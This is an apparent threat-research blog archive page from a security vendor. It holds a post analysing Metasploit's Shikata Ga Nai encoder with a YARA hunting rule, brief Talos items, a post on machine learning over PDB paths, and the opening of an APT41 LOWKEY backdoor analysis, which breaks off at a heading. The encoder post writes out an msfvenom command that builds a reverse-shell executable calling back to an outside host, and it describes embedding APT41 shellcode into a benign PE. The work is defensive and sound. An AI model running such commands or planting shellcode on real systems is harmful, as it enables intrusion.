Category Archives: Threat Research

Shikata Ga Nai Encoder Still Going Strong

One of the most popular exploit frameworks in the world is Metasploit. Its vast library of pocket exploits, pluggable payload environment, and simplicity of execution makes it the de facto base platform. Metasploit is used by pentesters, security enthusiasts, script kiddies, and even malicious actors. It is so prevalent that its user base even includes APT threat actors, as we will demonstrate later in the blog post.

Despite Metasploit’s over 15 year existence, there are still core techniques that go undetected, allowing malicious actors to evade detection. One of these core techniques is the Shikata Ga Nai (SGN) payload encoding scheme. Modern detection systems have improved dramatically over the last several years and will often catch plain vanilla versions of known malicious methods. In many cases though, if a threat actor knows what they are doing they can slightly modify existing code to bypass detection.

Before we jump into how SGN works we’ll give a little background knowledge surrounding it. When threat actors plan to attack systems, they go through an assessment process of risk and reward. They cycle through questions of stealth and attribution. Some of these questions include: How much effort do I need to put into not getting caught? What happens if I get caught? How long can I reasonably evade detection? Will the discovery of my presence be attributed back to me? One such way APT actors have attempted to elude detection in the first place has been via encoding.

We know shellcode is primarily a set of instructions designed to manipulate execution of a program in ways not originally intended. The goal is to inject this shellcode into a vulnerable process. To manually create shellcode one can pull the opcodes from disassembled code. Raw generated opcodes often will not execute out of the box. They often require being touched up and made compatible with the processor they are executed on and the programming language they are being used for. An encoding scheme such as SGN takes care of these incompatibilities. Also, shellcode in a non-obfuscated state can be readily recognizable via static detection techniques. SGN provides obfuscation and at a first glance, randomness in the obfuscation of the shellcode.

Metasploit’s default configuration encodes all payloads. While Metasploit contains a variety of encoders, the most popular has been SGN. The word SGN in the Japanese language means “nothing can be done”. It was given this name as at the time it was created traditional anti-virus products had difficulty with detection. As mentioned, some AV vendors are now catching vanilla implementations, but miss slightly modified variants.

SGN is a polymorphic XOR additive feedback encoder. It is polymorphic in that each creation of encoded shellcode is going to be different from the next. It accomplishes this through a variety of techniques such as dynamic instruction substitution, dynamic block ordering, randomly interchanging registers, randomizing instruction ordering, inserting junk code, using a random key, and randomization of instruction spacing between other instructions. The XOR additive feedback piece in this case refers to the fact the algorithm is XORing future instructions via a random key and then adding that instruction to the key to be used again to encode the next instruction. Decoding the shellcode is a process of following the steps in reverse.

Creating an SGN Encoded Payload

The following steps can be recreated with Metasploit and your choice of debugging/disassembly tools:

  1. First create a plain vanilla SGN encoded payload:
    msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.169.0.36 LPORT=80 -b "\x00" -e x86/shikata_ga_nai -f exe -o /root/Desktop/metasploit/IamNotBad.exe
  2. Open the file in a disassembler. Upon looking at the binary in a disassembler, you first notice a great deal of junk instructions (Figure 1). Also, Metasploit by default does not set the memory location of the code (.text section in this case) as writable. This will need to be set, otherwise the shellcode will not run.


Figure 1: Junk instructions when viewing the binary in a disassembler


Figure 2: RWX Flag = E0000020


Figure 3: Skip the junk code and go directly to the algorithm, which can be done by inserting a jump instruction

Algorithm Breakdown

The algorithm consists of:

  1. Initialization key specification.
  2. Retrieve a location relative to EIP (so that we can modify instructions moving forward based on the address obtained)
    • Metasploit commonly uses the fstenv/fnstenv instructions to put it on the stack where it can be popped into a register for use. There are other ways to get EIP if wanted.
  3. Go through a loop to decode other instructions (by default encoded instructions will all resides in the .text section)
    • Vanilla SGN zeroes out the register to be used as the counter and explicitly moves the counter value into the register, so the loop portion is obvious. The loop instruction is encoded so you won’t see it until decoding has gone far enough.
    • SGN decodes instructions at a higher memory address (it could do lower addresses if it wanted to for more trickery). This is done by adding a value to the stored address from before (the one relative to EIP) and XORing it with the key. In the example that follows you see the instruction XOR  [eax+18h], esi  t .text:00408B98.
    • The address from earlier (the one relative to EIP) is then modified and the key may also be modified [Metasploit by default usually adds or subtracts an instruction value somewhere relative to the address stored from before (the one relative to EIP)].
    • The loop continues until all instructions are decoded and then it moves execution to the decoded shellcode. In this case the reverse shellcode.
  4. As a side note, Shikata Ga Nai allows for multiple iterations. If multiple iterations are chosen, steps 1 to 3 are repeated after the completion of the current iteration.

As you can see from each of the aforementioned steps, if you’re a defender and solely relying on static detection, detection can be quite difficult. With something encoded like this, it is difficult to statically detect the specific malicious behavior without unrolling the encoded instructions. Constantly scanning memory is computationally expensive, making it less feasible. This leaves most detection platforms relying on the option of detecting via behavioral indicators or sandboxes.


Figure 4: Code before decoding


Figure 5: Instructions being decoded

For many of those that have been in cyber security for a while, this is not new. What is still relevant though is the fact that many malicious payloads encoded with SGN are still making it past defenses and still being used by threat actors. We noticed SGN encoded payloads still making it onto systems and we decided to investigate further. The results were both rewarding and surprising and led to additional detection methods discussed in the “Detection” section. It also gave us more awareness as to the extent SGN was still being used. The following is an example of a payload we recovered from an APT actor.

Embedding a Payload

For this example, we used an existing APT41 sample and embedded the payload into a benign PE. This APT41 sample is shellcode that is Shikata Ga Nai encoded.

MD5: def46c736a825c357918473e3c02b3ef

We will take a benign PE we created (ImNotBad.exe) and we will embed the APT41 sample to show SGN in action. We create a new section called NewSec and set the section values appropriately.


Figure 6: Calculate the size of the shell code. Start address 12000 and End Address 94C10. Make sure the size is within data that is there. The difference is 82c10.


Figure 7: Insert the shell code into the benign PE (ImNotBad.exe)


Figure 8: The embedded shellcode can be found in the code


Figure 9: Patch the code to jump to it


Figure 10: Here are the four steps from the Shikata Ga Nai algorithm (mentioned previously) demonstrated

In Figure 11 and Figure 12, as the first set of instructions are decoded it appears it is attempting to avoid normal execution. EA 25 D9 74 24 F4 BB => Note how the EA and 25 are inserted to cause code to crash (jumping to a curious spot in the code). Further effort was not applied to investigate the crash correctly, but when patching the code with nops, it executes the next decode sequence.


Figure 11: Set of instructions are decoded it appears it is attempting to avoid normal execution


Figure 12: Set of instructions are decoded it appears it is attempting to avoid normal execution

Detection

Detecting SGN encoded payloads can be difficult as a defender, especially if static detection is heavily relied upon. Decoding and unraveling the encoded instructions is necessary to identify the intended malicious purposes. Constantly scanning memory is computationally expensive, making it less feasible. This leaves most detection platforms relying on detection via behavioral indicators and sandboxes. FireEye appliances contain both static and dynamic detection components. Detection is achieved by a variety of engines, including FireEye's machine learning engine, MalwareGuard. The numerous engines within FireEye appliances serve specific purposes and have different strengths and weaknesses. Creating detection around these various engines allows FireEye to utilize each of their strengths. Correlating activity between these engines allows for unique detection opportunities. This also allows for production detections that would otherwise not be possible when relying on a single engine for detection. We were able to create production detections correlating the different engines on the FireEye appliances to detect SGN encoded binaries with a high fidelity. The current production detections take advantage of static, dynamic and machine learning engines within the FireEye appliance.

As an example of the complications concerned with detecting SGN, we will construct code encoded with a slightly modified version of Metasploit’s plain SGN algorithm (Figure 13): 


Figure 13: Example code for possible static detection

One of the keys to writing a good static detection rule is recognizing the unique malicious behaviors of what you are trying to detect. Next, being able to capture as much of that behavior without causing false positives (FPs). Earlier in the post we listed the core behaviors of the SGN algorithm. For sake of illustration, let’s try to match on some of those behaviors. We’ll attempt to match on the key, the mechanism used to get EIP, and the XOR additive feedback loop.

If we were trying to detect the code in Figure 13 statically, we could use the open source tool Yara. As a first pass we could construct the following rule (Figure 14):


Figure 14: Example SGN YARA static detection rule for the code in Figure 17

In the rule in Figure 14 we have added padding bytes to try and thwart an attacker that would insert junk instructions. If an adversary realized what we were matching on it could be easily defeated by inserting junk code beyond our padding. We could play the game of cat and mouse and continue to increase our padding based on what we saw, but this is not a good solution. In addition, as we pad more bytes out, the rule becomes more FP prone. Besides adding junk code, other obvious evasion techniques an attacker could use include: using different registers, performing arithmetic operations to obtain values or reordering instructions. Metasploit does a decent job randomizing the algorithm with these things which makes static detection more difficult. As we try to catch each modified version it could be never-ending.

Static detection is a useful technique, but very limited. If this is all you rely on, you will miss much of the malicious behavior getting onto your systems. For SGN, we studied it further and identified the core behavioral pieces. We saw how it was still being used by modern malware. The following is an example hunting rule that can be used to detect some of the current common permutations created by vanilla x86-SGN in Metasploit. This rule can be further expanded upon to include additional logic if desired.

rule Hunting_Rule_ShikataGaNai
{
    meta:
        author = "Steven Miller"
    strings:
        $varInitializeAndXorCondition1_XorEAX = { B8 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
        $varInitializeAndXorCondition1_XorEBP = { BD ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
        $varInitializeAndXorCondition1_XorEBX = { BB ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
        $varInitializeAndXorCondition1_XorECX = { B9 ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
        $varInitializeAndXorCondition1_XorEDI = { BF ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
        $varInitializeAndXorCondition1_XorEDX = { BA ?? ?? ?? ?? [0-30] D9 74 24 F4 [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
        $varInitializeAndXorCondition2_XorEAX = { D9 74 24 F4 [0-30] B8 ?? ?? ?? ?? [0-10] ( 59 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 40 | 41 | 42 | 43 | 45 | 46 | 47 ) ?? }
        $varInitializeAndXorCondition2_XorEBP = { D9 74 24 F4 [0-30] BD ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5E | 5F ) [0-50] 31 ( 68 | 69 | 6A | 6B | 6D | 6E | 6F ) ?? }
        $varInitializeAndXorCondition2_XorEBX = { D9 74 24 F4 [0-30] BB ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5C | 5D | 5E | 5F ) [0-50] 31 ( 58 | 59 | 5A | 5B | 5D | 5E | 5F ) ?? }
        $varInitializeAndXorCondition2_XorECX = { D9 74 24 F4 [0-30] B9 ?? ?? ?? ?? [0-10] ( 58 | 5A | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 48 | 49 | 4A | 4B | 4D | 4E | 4F ) ?? }
        $varInitializeAndXorCondition2_XorEDI = { D9 74 24 F4 [0-30] BF ?? ?? ?? ?? [0-10] ( 58 | 59 | 5A | 5B | 5C | 5D | 5E ) [0-50] 31 ( 78 | 79 | 7A | 7B | 7D | 7E | 7F ) ?? }
        $varInitializeAndXorCondition2_XorEDX = { D9 74 24 F4 [0-30] BA ?? ?? ?? ?? [0-10] ( 58 | 59 | 5B | 5C | 5D | 5E | 5F ) [0-50] 31 ( 50 | 51 | 52 | 53 | 55 | 56 | 57 ) ?? }
    condition:
        any of them
}

Thoughts

Metasploit is used by many different people for many different reasons. Some may use Metasploit for legitimate purposes such as red team engagements, research or educational tasks, while others may use the framework with a malicious intent. In the latter category, FireEye has historically observed APT20, a suspected Chinese nation state sponsored threat group, utilize Metasploit with SGN encoded payloads. APT20 is one of the many named threat groups that FireEye tracks. This group has a primary focus on stealing data, specifically intellectual properties. Other named groups include APT41 and FIN6. APT41 was formally disclosed by FireEye Intelligence earlier this year. This group has utilized SGN encoded payloads within custom developed backdoors. APT41 is a Chinese cyber threat group that has been observed carrying out financially motivated missions coinciding with cyber-espionage operations. Financial threat group FIN6 has also used SGN encoded payloads to carry out their missions, and they have historically relied upon various publicly available tools. These missions largely involve theft of payment card data from point-of-sale systems. FireEye has also observed numerous uncategorized threat groups utilizing payloads encoded with SGN. These are groups that FireEye tracks internally, but have not been announced formally. One of these groups in particular is UNC902, which is largely known as the financially motivated group TA505 in public threat reports. FireEye has observed UNC902 extensively use SGN encoding within their payloads and we continue to see activity related to this group, even as recently as October 2019. Outside of these groups, we continue to observe usage of SGN encoding within malicious samples. FireEye currently identifies hundreds of SGN encoded payloads on a monthly basis. SGN encoded payloads are not always used with the same intent, but this is one side effect of being embedded into such a popular and freely available framework. Looking forward, we expect to see continued usage of SGN encoded payloads.

Gustuff return, new features for victims

The Gustuff banking trojan is back with new features, months after initially appearing targeting financial institutions in Australia. Cisco Talos first reported on Gustuff in April. Soon after, the actors behind Gustuff started by changing the distribution hosts and later disabled its command and control (C2) infrastructure. The actor retained control of their malware since there is a secondary admin channel based on SMS.

The latest version of Gustuff no longer contains hardcoded package names, which dramatically lowers the static footprint when compared to previous versions. On the capability side, the addition of a “poor man scripting engine” based on JavaScript provides the operator with the ability to execute scripts while using its own internal commands backed by the power of JavaScript language. This is something that is very innovative in the Android malware space.

The first version of Gustuff that we analyzed was clearly based on Marcher, another banking trojan that’s been active for several years. Now, Gustuff has lost some similarities from Marcher, displaying changes in its methodology after infection.

Today, Gustuff still relies primarily on malicious SMS messages to infect users, mainly targeting users in Australia. Although Gustuff has evolved, the best defense remains token-based two-factor authentication, such as Cisco Duo, combined with security awareness and the use of only official app stores.

Read More >>

 

Threat Roundup for October 11 to October 18

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Oct 11 and Oct 18. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU10182019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

Definitive Dossier of Devilish Debug Details – Part Deux: A Didactic Deep Dive into Data Driven Deductions

In Part One of this blog series, Steve Miller outlined what PDB paths are, how they appear in malware, how we use them to detect malicious files, and how we sometimes use them to make associations about groups and actors.

As Steve continued his research into PDB paths, we became interested in applying more general statistical analysis. The PDB path as an artifact poses an intriguing use case for a couple of reasons.

­First, the PDB artifact is not directly tied to the functionality of the binary. As a byproduct of the compilation process, it contains information about the development environment, and by proxy, the malware author themselves. Rarely do we encounter static malware features with such an interesting tie to the human behind the keyboard, rather than the functionality of the file.

Second, file paths are an incredibly complex artifact with many different possible encodings. We had personally been dying to find an excuse to spend more time figuring out how to parse and encode paths in a more useful way. This presented an opportunity to dive into this space and test different approaches to representing file paths in various models.

The objectives of our project were:

  1. Build a large data set of PDB paths and apply some statistical methods to find potentially new signature terms and logic.
  2. Investigate whether applying machine learning classification approaches to this problem could improve our detection above writing hand-crafted signatures.
  3. Build a PDB classifier as a weak signal for binary analysis.

To start, we began gathering data. Our dataset, pulled from internal and external sources, started with over 200,000 samples. Once we deduplicated by PDB path, we had around 50,000 samples. Next, we needed to consistently label these samples, so we considered various labeling schemes.

Labeling Binaries With PDB Paths

For many of the binaries we had internal FireEye labels, and for others we looked up hashes on VirusTotal (VT) to have a look at their detection rates. This covered the majority of our samples. For a relatively small subset we had disagreements between our internal engine and VT results, which merited a slightly more nuanced policy. The disagreement was most often that our internal assessment determined a file to be benign, but the VT results showed a nonzero percentage of vendors detecting the file as malicious. In these cases we plotted the ‘VT ratio”: that is, the percentage of vendors labeling the files as malicious (Figure 1).


Figure 1: Ratio of vendors calling file bad/total number of vendors

The vast majority of these samples had VT detection ratios below 0.3, and in those cases we labeled the binaries as benign. For the remainder of samples we tried two strategies – marking them all as malicious, or removing them from the training set entirely. Our classification performance did not change much between these two policies, so in the end we scrapped the remainder of the samples to reduce label noise.

Building Features

Next, we had to start building features. This is where the fun began. Looking at dozens and dozens of PDB paths, we simply started recording various things that ‘pop out’ to an analyst. As noted earlier, a file path contains tons of implicit information, beyond simply being a string-based artifact. Some analogies we have found useful is that a file path is more akin to a geographical location in its representation of a location on the file system, or like a sentence in that it reflects a series of dependent items.

To further illustrate this point, consider a simple file path such as:

C:\Users\World\Desktop\duck\Zbw138ht2aeja2.pdb (source file)

This path tells us several things:

  • This software was compiled on the system drive of the computer
  • In a user profile, under user ‘World’
  • The project is managed on the Desktop, in a folder called ‘duck’
  • The filename has a high degree of entropy and is not very easy to remember

In contrast, consider something such as:

D:\VSCORE5\BUILD\VSCore\release\EntVUtil.pdb (source file)

This indicates:

  • Compilation on an external or secondary drive
  • Within a non-user directory
  • Contains development terms such as ‘BUILD’ and ‘release’
  • With a sensible, semi-memorable file name

These differences seem relatively straightforward and make intuitive sense as to why one might be representative of malware development whereas the other represents a more “legitimate-looking” development environment.

Feature Representations

How do we represent these differences to a model? The easiest and most obvious option is to calculate some statistics on each path. Features such as folder depth, path length, entropy, and counting things such as numbers, letters, and special characters in the PDB filename are easy to compute.

However, upon evaluation against our dataset, these features did not help to separate the classes very well. The following are some graphics detailing the distributions of these features between our classes of malicious and benign samples:

While there is potentially some separation between benign and malicious distributions, these features alone would likely not lead to an effective classifier (we tried). Additionally, we couldn’t easily translate these differences into explicit detection rules. There was more information in the paths that we needed to extract, so we began to look at how to encode the directory names themselves.

Normalization

As with any dataset, we had to undertake some steps to normalize the paths. For example, the occurrence of individual usernames, while perhaps interesting from an intelligence perspective, would be represented as distinct entities when in fact they have the same semantic meaning. Thus, we had to detect and replace usernames with <username> to normalize this representation. Other folder idiosyncrasies such as version numbers or randomly generated directories could similarly be normalized into <version> or <random>.

A typical normalized path might therefore go from this:

C:\Users\jsmith\Documents\Visual Studio 2013\Projects\mkzyu91952\mkzyu91952\obj\x86\Debug\mkzyu91952.pdb

To this:

c:\users\<username>\documents\visual studio 2013\projects\<random>\<random>\obj\x86\debug\mkzyu91952.pdb

You may notice that the PDB filename itself was not normalized. In this case we wanted to derive features from the filename itself, so we left it. Other approaches could be to normalize it, or even to make note that the same filename string ‘mkzyu91952’ appears earlier in the path. There are endless possible features when dealing with file paths.

Directory Analysis

Once we had normalized directories, we could start to “tokenize” each directory term, to start performing some statistical analysis. Our main goal of this analysis was to see if there were any directory terms that highly corresponded to maliciousness, or see if there were any simple combinations, such as pairs or triplets, that exhibited similar behavior.

We did not find any single directory name that easily separated the classes. That would be too easy. However, we did find some general correlations with directories such as “Desktop” being somewhat more likely to be malicious, and use of shared drives such as Z: to be more indicative of a benign file. This makes intuitive sense given the more collaborative environment a “legitimate” software development process might require. There are, of course, many exceptions and this is what makes the problem tricky.

Another strong signal we found, at least in our dataset, is that when the word “Desktop” was in a non-English language and particularly in a different alphabet, the likelihood of that PDB path being tied to a malicious file was very high (Figure 2). While potentially useful, this can be indicative of geographical bias in our dataset, and further research would need to be done to see if this type of signature would generalize.


Figure 2: Unicode desktop folders from malicious samples

Various Tokenizing Schemes

In recording the directories of a file path, there are several ways you can represent the path. Let’s use this path to illustrate these different approaches:

c:\Leave\smell\Long\ruleThis.pdb (file)

Bag of Words

One very simple way is the “bag-of-words” approach, which simply treats the path as the distinct set of directory names it contains. Therefore, the aforementioned path would be represented as:

[‘c:’,’leave’,’smell’,’long’,’rulethis’]

Positional Analysis

Another approach we considered was recording the position of each directory name, as a distance from the drive. This retained more information about depth, such that a ‘build’ directory on the desktop would be treated differently than a ‘build’ directory nine directories further down. For this purpose, we excluded the drives since they would always have the same depth.

[’leave_1’,’smell_2’,’long_3’,’rulethis_4’]

N-Gram Analysis

Finally, we explored breaking paths into n-grams; that is, as a distinct set of n- adjacent directories. For example, a 2-gram representation of this path might look like:

[‘c:\leave’,’leave\smell’,’smell\long’,’long\rulethis’]

We tested each of these approaches and while positional analysis and n-grams contained more information, in the end, bag-of-words seemed to generalize best. Additionally, using the bag-of-words approach made it easier to extract simple signature logic from the resultant models, as will be shown in a later section.

Term Co-Occurrence

Since we had the bag-of-words vectors created for each path, we were also able to evaluate term co-occurrence across benign and malicious files. When we evaluated the co-occurrence of pairs of terms, we found some other interesting pairings that indeed paint two very different pictures of development environments (Figure 3).

Correlated with Malicious Files

Correlated with Benign Files

users, desktop

src, retail

documents, visual studio 2012

obj, x64

local, temporary projects

src, x86

users, projects

src, win32

users, documents

retail, dynamic

appdata, temporary projects

src, amd64

users, x86

src, x64

Figure 3: Correlated pairs with malicious and benign files

Keyword Lists

Our bag-of-words representation of the PDB paths then gave us a distinct set of nearly 70,000 distinct terms. The vast majority of these terms occurred once or twice in the entire dataset, resulting in what is known as a ‘long-tailed’ distribution. Figure 4 is a graph of only the top 100 most common terms in descending order.


Figure 4: Long tailed distribution of term occurrence

As you can see, the counts drop off quickly, and you are left dealing with an enormous amount of terms that may only appear a handful of times. One very simple way to solve this problem, without losing a ton of information, is to simply cut off a keyword list after a certain number of entries. For example, take the top 50 occurring folder names (across both good and bad files), and save them as a keyword list. Then match this list against every path in the dataset. To create features, one-hot encode each match.  

Rather than arbitrarily setting a cutoff, we wanted to know a bit more about the distribution and understand where might be a good place to set a limit – such that we would cover enough of the samples without drastically increasing the number of features for our model. We therefore calculated the cumulative number of samples covered by each term, as we iterated down the list from most common to least common. Figure 5 is a graph showing the result.


Figure 5: Cumulative share of samples covered by distinct terms

As you can see, with only a small fraction of the terms, we can arrive at a significant percentage of the cumulative total PDB paths. Setting a simple cutoff at about 70% of the dataset resulted in roughly 230 terms for our total vocabulary. This gave us enough information about the dataset without blowing up our model with too many features (and therefore, dimensions). One-hot encoding the presence of these terms was then the final step in featurizing the directory names present in the paths.

YARA Signatures Do Grow on Trees

Armed with some statistical features, as well as one-hot encoded keyword matches, we began to train some models on our now-featurized dataset. In doing so, we hoped to use the model training and evaluation process to give us insights into how to build better signatures. If we developed an effective classification model, that would be an added benefit.

We felt that tree-based models made sense for this use case for two reasons. First, tree-based models have worked well in the past in domains requiring a certain amount of interpretability and using a blend of quantitative and categorical features. Second, the features we used are largely things we could represent in a YARA signature. Therefore, if our models built boolean logic branches that separated large numbers of PDB files, we could potentially translate these into signatures. This is not to say that other model families could not be used to build strong classifiers. Many other options ranging from Logistic Regression to Deep Learning could be considered.

We fed our featurized training set into a Decision Tree, having set a couple ‘hyperparameters’ such as max depth and minimum samples per leaf, etc. We were also able to use a sliding scale of these hyperparameters to dynamically create trees and, essentially, see what shook out. Examining a trained decision tree such as the one in Figure 6 allowed us to immediately build new signatures.


Figure 6: Example decision tree and decision paths

We found several other interesting tidbits within our decision trees. Some terms that resulted in completely or almost-completely malicious subgroups are:

Directory Term

Example Hashes

\poe\

a6b2aa2b489fb481c3cd9eab2f4f4f5c

92904dc99938352525492cd5133b9917

444be936b44cc6bd0cd5d0c88268fa77

\xampp\

4d093061c172b32bf8bef03ac44515ae

4e6c2d60873f644ef5e06a17d85ec777

52d2a08223d0b5cc300f067219021c90

\temporary projects\

a785bd1eb2a8495a93a2f348c9a8ca67

c43c79812d49ca0f3b4da5aca3745090

e540076f48d7069bacb6d607f2d389d9

\stub\

5ea538dfc64e28ad8c4063573a46800c

adf27ce5e67d770321daf90be6f4d895

c6e23da146a6fa2956c3dd7a9314fc97

We also found the term ‘WindowsApplication1’ to be quite useful. 89% of the files in our dataset containing this directory were malicious. Cursory research indicates that this is the default directory generated when using Visual Studio to compile a Windows binary. Once again, this makes some intuitive sense for finding malware authors. Training and evaluating decision trees with various parameters turned out to be a hugely productive exercise in discovering potential new signature terms and logic.

Classification Accuracy and Findings

Since we now had a large dataset of PDB paths and features, we wanted to see if we could train a traditional classifier to separate good files from bad. Using a Random Forest with some tuning, we were able to achieve an average accuracy of 87% over 10 cross validations. However, while our recall (the percentage of bad things we could identify with the model) was relatively high at 89%, our malware precision (the share of those things we called bad that were actually bad) was far too low, hovering at or below 50%. This indicates that using this model alone for malware detection would result in an unacceptably large number of false positives, were we to deploy it in the wild as a singular detection platform. However, used in conjunction with other tools, this could be a useful weak signal to assist with analysis.

Conclusion and Next Steps

While our journey of statistical PDB analysis did not yield a magic malware classifier, it did yield a number of useful findings that we were hoping for:

  1. We developed several file path feature functions which are transferable to other models under development.
  2. By diving into statistical analysis of the dataset, we were able to identify new keywords and logic branches to include in YARA signatures. These signatures have since been deployed and discovered new malware samples.
  3. We answered a number of our own general research questions about PDB paths, and were able to dispel some theories we had not fully tested with data.

While building an independent classifier was not the primary goal, improvements can surely be made to improve the end model accuracy. Generating an even larger, more diverse dataset would likely make the biggest impact on our accuracy, recall, and precision. Further hyperparameter tuning and feature engineering could also help. There is a large amount of established research into text classification using various deep learning methods such as LSTMs, which could be applied effectively to a larger dataset.

PDB paths are only one small family of file paths that we encounter in the field of cyber security. Whether in initial infection, staging, or another part of the attack lifecycle, the file paths found during forensic analysis can reveal incredibly useful information about adversary activity. We look forward to further community research on how to properly extract and represent that information.

LOWKEY: Hunting for the Missing Volume Serial ID

In August 2019, FireEye released the “Double Dragon” report on our newest graduated threat group: APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services.

This blog post is about the sophisticated passive backdoor we track as LOWKEY, mentioned in the APT41 report and recently unveiled at the FireEye Cyber Defense Summit. We observed LOWKEY being used in highly targeted attacks, utilizing payloads that run only on specific systems. Additional malware family names are used in the blog post and briefly described. For a complete overview of malware used by APT41 please refer to the Technical Annex section of our APT41 report.

The blog post is split into three parts, which are shown in Figure 1. The first describes how we managed to analyze the encrypted payloads. The second part features position independent loaders we observed in multiple samples, adding an additional layer of obfuscation. The final part is about the actual backdoor we call LOWKEY, which comes in two variants, a passive TCP listener and a passive HTTP listener targeting Internet Information Services (IIS).


Figure 1: Blog post overview

DEADEYE – RC5

Tracking APT41 activities over the past months, we observed multiple samples that shared two unique features: the use of RC5 encryption which we don’t encounter often, and a unique string “f@Ukd!rCto R$.”. We track these samples as DEADEYE.

DEADEYE comes in multiple variants:

  • DEADEYE.DOWN has the capability to download additional payloads.
  • DEADEYE.APPEND has additional payloads appended to it.
  • DEADEYE.EXT loads payloads that are already present on the system.

DEADEYE.DOWN

A sample belonging to DEADEYE.DOWN (MD5: 5322816c2567198ad3dfc53d99567d6e) attempts to download two files on the first execution of the malware.

The first file is downloaded from hxxp://checkin.travelsanignacio[.]com/static/20170730.jpg. The command and control (C2) server response is first RC5 decrypted with the key “wsprintfA” and then RC5 encrypted with a different key and written to disk as <MODULE_NAME>.mui.

The RC5 key is constructed using the volume serial number of the C drive. The volume serial number is a 4-byte value, usually based on the install time of the system. The volume serial number is XORed with the hard-coded constant “f@Ukd!rCto R$.” and then converted to hex to derive a key of up to 28 bytes in length. The key length can vary if the XORed value contains an embedded zero byte because the lstrlenA API call is used to determine the length of it. Note that the lstrlenA API call happens before the result is converted to hex. If the index of the byte modulo 4 is zero, the hex conversion is in uppercase. The key derivation is illustrated in Table 1.

Volume Serial number of C drive, for example 0xAABBCCDD

F          ^          0xAA

=          0xCC

uppercase

@         ^          0xBB

=          0xFB

lowercase

U          ^          0xCC

=          0x99

lowercase

k          ^          0xDD

=          0xB6

lowercase

d          ^          0xAA

=          0xCE

uppercase

!           ^          0xBB

=          0x9A

lowercase

r           ^          0xCC

=          0xBE

lowercase

C          ^          0xDD

=          0x9E

lowercase

t           ^          0xAA

=          0xDE

uppercase

o          ^          0xBB

=          0xD4

lowercase

(0x20)   ^          0xCC

=          0xEC

lowercase

R          ^          0xDD

=          0x8F

lowercase

$          ^          0xAA

=          0x8E

uppercase

.           ^          0xBB

=          0x95

lowercase

Derived key CCfb99b6CE9abe9eDEd4ec8f8E95

Table 1: Key derivation example

The second file is downloaded from hxxp://checkin.travelsanignacio[.]com/static/20160204.jpg. The C2 response is RC5 decrypted with the key “wsprintfA” and then XORed with 0x74, before it is saved as C:\Windows\System32\wcnapi.mui.


Figure 2: 5322816c2567198ad3dfc53d99567d6e download

The sample then determines its own module name, appends the extension mui to it and attempts to decrypt the file using RC5 encryption. This effectively decrypts the file the malware just downloaded and stored encrypted on the system previously. As the file has been encrypted with a key based on the volume serial number it can only be executed on the system it was downloaded on or a system that has the same volume serial number, which would be a remarkable coincidence.

An example mui file is the MD5 hash e58d4072c56a5dd3cc5cf768b8f37e5e. Looking at the encrypted file in a hex editor reveals a high entropy (7.999779/8). RC5 uses Electronic Code Book (ECB) mode by default. ECB means that each code block (64 bit) is encrypted independent from other code blocks. This means the same plaintext block always results in the same cipher text, independent from its position in the binary. The file has 792933 bytes in total but almost no duplicate cipher blocks, which means the data likely has an additional layer of encryption.

Without the correct volume serial number nor any knowledge about the plaintext there is no efficient way to decrypt the payload e58d4072c56a5dd3cc5cf768b8f37e5e with just the knowledge of the current sample.

DEADEYE.APPEND

Fortunately searching for the unique string “f@Ukd!rCto R$.“ in combination with artifacts from RC5 reveals additional samples. One of the related samples is DEADEYE.APPEND (MD5: 37e100dd8b2ad8b301b130c2bca3f1ea), which has been previously analyzed by Kaspersky (https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/). This sample is different because it is protected with VMProtect and has the obfuscated binary appended to it. The embedded binary starts at offset 3287552 which can be seen in Figure 3 with the differing File Size and PE Size.


Figure 3: A look at the PE header reveals a larger file size than PE size

The encrypted payload has a slightly lower entropy of 7.990713 out of 8. Looking at the embedded binary in a hex editor reveals multiple occurrences of the byte pattern 51 36 94 A4 26 5B 0F 19, as seen in Figure 4. As this pattern occurs multiple times in a row in the middle of the encrypted data and ECB mode is being used, an educated guess is that the plaintext is supposed to be 00 00 00 00 00 00 00 00.


Figure 4: Repeating byte pattern in 37e100dd8b2ad8b301b130c2bca3f1ea

RC5 Brute Forcer

